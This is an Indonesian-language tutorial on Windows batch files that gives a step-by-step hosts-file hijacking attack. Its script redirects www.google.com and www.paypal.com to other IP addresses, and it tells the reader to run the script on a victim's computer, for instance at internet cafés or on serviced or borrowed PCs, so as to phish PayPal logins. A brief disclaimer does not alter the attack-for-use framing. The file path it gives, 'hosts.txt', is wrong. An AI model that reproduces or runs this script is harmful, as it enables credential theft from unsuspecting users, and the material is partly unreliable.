| INFORMASI DASAR |
| Pemrograman batch file adalah program asli yang ditawarkan oleh Microsoft Windows Operating System . Batch file dibuat menggunakan editor teks seperti notepad , WordPad , WinWord atau sebagainya , yang terdiri dari urutan built -in perintah yang digunakan untuk melakukan beberapa tugas sering dilakukan seperti menghapus serangkaian file dari jenis yang sama atau jenis yang berbeda , menciptakan log , membersihkan craps tidak diinginkan dari komputer Anda dan bahkan untuk menciptakan vIRUS batch. |
=> MERACUNI DNS
Batch File dapat memiliki kecenderungan untuk mengubah zona transfer dengan mengedit file hosts.txt yang berada di dalam ' C : \ windows \ system32 \ drivers \ etc \ hosts.txt ' , sehingga akan membawa Anda ke beberapa situs berbahaya bukan mendarat Anda ke situs web yang sah . Hal ini juga dapat digunakan untuk phishing , yaitu mengarahkan Anda ke situs web palsu yang tampak persis seperti yang sah , dan kemudian mencuri kredensial.
Di sini saya hanya membagikan ilmunya saja akan tetapi tidak untuk di salah gunakan untuk pishing informasi yang merugikan orang lain dan saya tidak bertanggung jawab atas penyalah gunaan.
langsung saja di praktekan langkah-langkah di bawah ini :
1. silahkan buka notepad, WordPad , WinWord atau yang semisalnya lalu copy script di bawah ini :
@echo off
echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt
echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt
exit
2. save file tersebut dengan mengubah exstensinya menjadi .bat contoh GOKIL.bat
3. Jalankan file tersebut di komputer/pc korban untuk menginfeksi komputer tersebut. (sebagai tambahan: biasanya pada kasus seperti ini para hacker menjalankan virus yang semisal di layanan internet umum, komputer yang di service, dan perangkat yang di pinjam... untuk menghindari kejahatan semacam ini maka kita harus lebih berhati-hati saat menggunakan jasa internet umum atau biasanya warnet dan kita harus lebih berhati-hati saat service laptop/pc atau meminjamkanya ke orang lain. semoga tambahan ini bermanfaat)
4. Program ini menciptakan entri baru di file host , sehingga setiap kali pengguna mencoba untuk pindah ke www.google.com , ia akan diarahkan kembali ke host lain yang memiliki alamat IP dari 10.199.64.66 , juga jika upaya pengguna untuk login ke akun paypal dengan mengetikkan www.paypal.com , ia akan diarahkan kembali ke website lain palsu eksternal yang memiliki alamat IP dari 10.199.64.67 , di mana jika pengguna memasukkan kredensial sadar , mereka menjadi hacker database dan ia dapat menggunakannya untuk beberapa tujuan lainnya .
Sekian pembahasan dari saya semoga bermanfaat...
